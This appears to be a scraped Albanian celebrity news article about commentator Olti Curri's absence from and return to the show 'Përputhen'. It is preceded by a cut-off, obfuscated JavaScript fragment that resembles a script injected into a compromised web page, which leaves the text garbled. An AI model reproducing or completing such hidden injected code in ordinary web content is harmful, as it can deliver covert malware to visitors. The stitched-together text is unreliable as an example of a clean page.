;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A është larguar Olti Curri nga ‘Përputhen’?!

By

Vjeshtën e kaluar, opinionisti Olti Curri u rikthye me kohë të plotë në ekran si opinionist në ‘Përputhen’.

Me natyrën e tij që nuk e lë askënd rehat brenda zonës së konfortit, Olti i dha një tjetër dinamikë rrjedhës së programit duke ngacmuar e duke vënë në pah të gjitha pikat e konkurentëve.

Megjithatë, janë bërë disa javë prej kur Olti mungon në program. Si të mos mjaftonte kjo, në rolin e  opinionistit javën që lamë pas e zuri Armand Peza.

Komentet në rrjet kanë qenë të shumta dhe një pjesë prej tyre i ka ndarë vetë Olti përmes një postimi në Instagram duke e lënë në pikëpyetje pjesëmarrjen e tij në format.

Sidoqoftë, shkëputja duket të ketë qenë vëtëm shkaku i rrethanave të pandemisë. Është zbuluar se Olti rikthehet sot në përbërjen e formatit për të mos i munguar shikuesve të tij besnikë. /Prive.al

Artikuj të ngjashëm